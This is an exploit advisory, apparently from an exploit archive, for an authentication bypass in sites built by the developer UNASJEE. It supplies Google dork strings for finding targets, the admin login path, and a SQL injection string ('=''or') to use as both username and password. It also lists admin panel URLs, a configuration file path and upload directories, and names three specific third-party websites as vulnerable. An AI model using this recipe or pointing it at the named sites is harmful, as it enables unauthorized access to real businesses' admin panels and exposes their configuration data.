Design and Developed By UNASJEE Authentication Bypass Vulnerability

#################################################################################################

# Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/09/2018
# Vendor Homepage : unasjee.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]

#################################################################################################

# Google Dork  : 

intext:''Designed & Developed by: UNASJEE''

intext:''Developed by: UNASJEE''

# Admin Control Panel Path : /admincp/index.php

# Exploit : 

Admin Username : '=''or'

Admin Password : '=''or'

# Configuration File Directory Path : /admincp/config.inc

# Useable Admin Control Panel URL Links => 

/admincp/mmainsections.php
/admincp/edititem.php
/admincp/allproducts2.php?sort=isNew
/admincp/allproducts2.php?sort=isSug
/admincp/allproducts.php?sort=order%20by%20ItmName
/admincp/allproducts.php?sort=order%20by%20ArtNo
/admincp/allproducts2.php?sort=soption
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/editemail2.php
/admincp/newsletters.php
/admincp/links.php
/admincp/sendnewsletters.php
/admincp/changepass.php
/admincp/profile.php
/admincp/contact2.php
/admincp/f-view.php
/admincp/ani.php

# Directory File Paths => 

/admincp/sdata/itmimgs/....
/admincp/sdata/banner/.... 
/admincp/sdata/fviewimgs/...
/admincp/sdata/itmimgs/...
/admincp/sdata/mainimgs/...
/admincp/sdata/mimgs/...
/admincp/sdata/msecimgs/...	 
/admincp/sdata/nextimgs/...
/admincp/sdata/secbanner/...	 
/admincp/sdata/secimgs/.. 
/admincp/sdata/subimgs/...

#################################################################################################

# Example Vulnerable Sites => 

tbshandtools.com/admincp/index.php  => [ Proof of Concept ] => archive.is/3fTzD

chableather.com/admincp/index.php

fadensports.com/admincp/config.inc

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################